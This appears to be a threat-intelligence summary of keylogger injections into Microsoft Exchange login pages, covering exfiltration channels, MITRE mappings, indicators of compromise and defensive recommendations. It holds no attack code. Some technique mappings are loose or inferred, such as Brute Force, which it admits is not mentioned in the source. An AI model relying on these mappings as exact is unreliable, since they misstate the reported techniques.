In May 2024 and continuing into 2025, keyloggers were found injected into Microsoft Exchange Server login pages, capturing user credentials by either saving data locally or sending it to external servers. The attacks impacted over 65 victims across 26 countries, with government organizations being heavily targeted. #MicrosoftExchange #Keylogger #PositiveTechnologies
Keypoints
- Malicious code was injected into Microsoft Exchange Server login pages to capture user credentials through two main types of keyloggers: local logging and remote exfiltration.
- Local logging keyloggers save stolen credentials to files on the server accessible externally without using command and control servers, aiding stealth.
- Remote keyloggers send data immediately to external servers via methods like HTTP POST/GET, Telegram bots, Discord, and DNS tunneling.
- The attackers targeted servers in 26 countries, with the majority of compromised servers belonging to government entities, as well as IT, industrial, and logistics sectors.
- Exploitation of known Microsoft Exchange vulnerabilities likely facilitated many attacks, though some compromised servers did not have known vulnerabilities.
- Obfuscated JavaScript code was used to evade detection, and stolen data sometimes included cookies and User-Agent headers.
- Recommendations include vulnerability management, using web application protection tools, SIEM/EDR solutions, integrity checks, YARA scanning, and retrospective compromise assessments.
MITRE Techniques
- [T1056.001] Input Capture: Keylogging – Malicious JavaScript code was injected into Microsoft Exchange login pages to capture user credentials via form input processing (‘…malicious JavaScript code reads and processes the data from the authentication form…’).
- [T1071.001] Application Layer Protocol: Web Protocols – Collected credential data was sent using HTTP POST/GET requests and DNS tunneling to external servers (‘…data could be sent as parameters in a GET request…using a DNS tunnel…’).
- [T1110] Brute Force – Although not explicitly mentioned, exploiting Exchange server vulnerabilities to gain initial access suggests credential access methods (‘…exploiting these vulnerabilities could have been one of the attack vectors…’).
- [T1140] Deobfuscate/Decode Files or Information – Attackers used obfuscated JavaScript code to hide malicious logic (‘Obfuscation of malicious code…example of deobfuscated code…’).
- [T1074] Data Staged – Keyloggers stored stolen credentials in local files accessible externally for later retrieval (‘…writes the data to a file on the server accessible from an external network…’).
- [T1560.002] Archive Collected Data: Archive via Web Service – use of Telegram bots and legitimate services like Discord to exfiltrate data (‘…a dedicated server, a Telegram bot, or other legitimate services (such as Discord) can be used…’).
Indicators of Compromise
- [File Paths] Suspicious modified authentication pages – C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthlogon.aspx and related pages such as /owa/auth/lo.aspx, /owa/auth/getidtokens.aspx.
- [File Hashes] Malicious JavaScript code samples – Several unidentified hashes related to injected keylogger scripts (examples not provided, referenced as “and 2 more hashes”).
- [Network Indicators] External server URLs and Telegram bot channels used for data exfiltration – endpoints like /owa/auth/logon.aspx and Telegram bot identifiers (redacted in source).
- [YARA Rules] Detection signature for injected keyloggers – rule PTESCexploitwinZZExchangeKeyloggerJavascript for scanning suspicious Exchange authentication files.